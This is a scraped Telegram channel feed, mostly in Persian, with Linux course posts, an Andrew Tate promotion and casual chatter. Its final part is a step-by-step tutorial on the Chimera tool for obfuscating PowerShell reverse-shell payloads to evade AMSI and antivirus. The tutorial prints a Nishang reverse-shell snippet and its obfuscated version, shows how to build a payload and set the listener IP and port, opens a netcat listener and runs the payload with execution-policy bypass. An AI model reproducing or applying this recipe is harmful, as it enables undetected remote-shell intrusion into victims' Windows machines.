The Future of ZFS on Ubuntu Desktop is Not Looking Good
https://www.omgubuntu.co.uk/2023/01/ubuntu-zfs-support-status
https://www.omgubuntu.co.uk/2023/01/ubuntu-zfs-support-status
OMG! Ubuntu!
The Future of ZFS on Ubuntu Desktop is Not Looking Good
Things were looking promising for ZFS on Ubuntu. In 2019 Ubuntu was the first major Linux distro to offer a ZFS install option. Sadly, things have changed.
Cafe Linux
Voice message
🔹 درمورد اینه که انگلیسی چجوری بخونید ، یه سریاتون پرسیده بودید . نظرات خودمو دادم
❤4👨💻3👍1
Cafe Linux
Voice message
درمورد لهجه های مختلف هم بعدا حرف میزنم ، قرار نیست با لهجه صحبت کنم ولی فقط میگم که چندتا لهجه و زبان محلی داخل انگلیسی داریم که اطلاعاتتون بره بالا
👍6
Media is too big
VIEW IN TELEGRAM
Hustlers University 2.0 | FREE 1 Hour Training Hosted by Andrew Tate
👍6
Cafe Linux
Hustlers University 2.0 | FREE 1 Hour Training Hosted by Andrew Tate
حقایق پول ، اندرو تیت 👑 ، علاقمندان ببینن
👎2
🔹 فیلم بعدی فردا رلیز میشه چون دسترسی به سیستم ندارم دوستان ، ولی فیلم بعدی یکی از مهم ترین ویدیوهای این فصل لینوکسیه که رکورد کردم .
💯3👍1
دوستان فیلم رکورد شده ولی به دلیل ضعیف بودن اینترنت ( بگو مرگ بر امریکا ) به سختی آپلود میشه . آپلود بشه حتما میزارمش . من از طرف آمریکا از شما معذرت خواهی میکنم .
🏆6⚡1🍾1
بعد از 40 دقیقه 30 مگابایت آپلود بشه نشون دهنده اینه که ما قدرت اول جهانیم
🤬12🕊3
Media is too big
VIEW IN TELEGRAM
🔸 CafeLinux Linux Essential 7
🔹 Hardware
🔹 Boot Loader
🔹 Firmwares
🔹 How Linux boots
🔹 What is FHS ( intro )
توضیح دادم سخت افزارتون چجوری firmware رو ران میکنه ، سیستم عامل چجوری سخت افزار و میشناسه ، چجوری میرسیم به بوت لودر ،بوت لودر چجوری کرنل رو اجرا میکنه و بعدش چی میشه و . . . .
#CafeLinux #linuxessential #Linux
🔹 Hardware
🔹 Boot Loader
🔹 Firmwares
🔹 How Linux boots
🔹 What is FHS ( intro )
توضیح دادم سخت افزارتون چجوری firmware رو ران میکنه ، سیستم عامل چجوری سخت افزار و میشناسه ، چجوری میرسیم به بوت لودر ،بوت لودر چجوری کرنل رو اجرا میکنه و بعدش چی میشه و . . . .
#CafeLinux #linuxessential #Linux
👍11❤3
This media is not supported in your browser
VIEW IN TELEGRAM
[ Tags ]
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
❤2
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1
2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
❤4👍1